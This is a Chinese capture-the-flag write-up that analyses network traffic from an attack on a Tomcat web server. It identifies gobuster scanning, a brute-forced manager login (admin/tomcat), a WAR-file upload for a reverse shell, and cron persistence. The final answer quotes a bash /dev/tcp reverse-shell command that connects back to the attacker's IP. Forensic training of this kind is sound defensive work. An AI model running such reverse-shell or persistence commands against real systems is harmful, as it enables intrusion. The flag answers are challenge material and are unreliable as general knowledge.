简介：

1、在web服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描行为,通过分析扫描的行为后提交攻击者IP flag格式：flag{ip}，如：flag{127.0.0.1}
2、找到攻击者IP后请通过技术手段确定其所在地址 flag格式: flag{城市英文小写}
3、哪一个端口提供对web服务器管理面板的访问？ flag格式：flag{2222}
4、经过前面对攻击者行为的分析后,攻击者运用的工具是？ flag格式：flag{名称}
5、攻击者拿到特定目录的线索后,想要通过暴力破解的方式登录,请通过分析流量找到攻击者登录成功的用户名和密码？ flag格式：flag{root-123}
6、攻击者登录成功后,先要建立反弹shell,请分析流量提交恶意文件的名称？ flag格式：flag{114514.txt}
7、攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息？ flag提示,某种任务里的信息

1.

在web服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描行为,通过分析扫描的行为后提交攻击者IP flag格式：flag{ip}，如：flag{127.0.0.1}

统计IP，从次数最多的IP开始分析

可以看到 14.0.0.120 对 10.0.0.112 很多请求且状态码是404，明显是目录扫描行为

我们再定位该IP继续查看，过滤器语法ip.addr == 14.0.0.120，可以看到有很多畸形TCP流量，是端口扫描行为，至此可以确定攻击者IP为14.0.0.120，flag{14.0.0.120}

‍

2.

找到攻击者IP后请通过技术手段确定其所在地址 flag格式: flag{城市英文小写}

我们可以用在线的IP定位网站查询攻击者所在地址，所在地址为 广东省 广州市 亚洲 中国 ，flag{guangzhou}

‍

3.

哪一个端口提供对web服务器管理面板的访问？ flag格式：flag{2222}

过滤器语法ip.addr == 14.0.0.120 && http，可以看到大多端口都是8080，有个/manager/html的路由也是8080端口，flag{8080}

‍

4.

经过前面对攻击者行为的分析后,攻击者运用的工具是？ flag格式：flag{名称}

追踪http流，在User-Agent头里可以发现工具名为gobuster，版本为3.6，flag{gobuster}

‍

5.

攻击者拿到特定目录的线索后,想要通过暴力破解的方式登录,请通过分析流量找到攻击者登录成功的用户名和密码？ flag格式：flag{root-123}

可以看这一片 manager 的流量，我们直接看返回值200的就行，我们看 authorization 字段就是用户名和密码，flag{admin-tomcat}

‍

6.

攻击者登录成功后,先要建立反弹shell,请分析流量提交恶意文件的名称？ flag格式：flag{114514.txt}

可以看到攻击者登陆成功后上传了一个war包，flag{JXQOZY.war}

‍

7.

攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息？ flag提示,某种任务里的信息

我们继续追踪后面的TCP流，可以发现攻击者通过 crontab计划任务 反弹shell，flag{/bin/bash -c ‘bash -i >& /dev/tcp/14.0.0.120/443 0>&1’}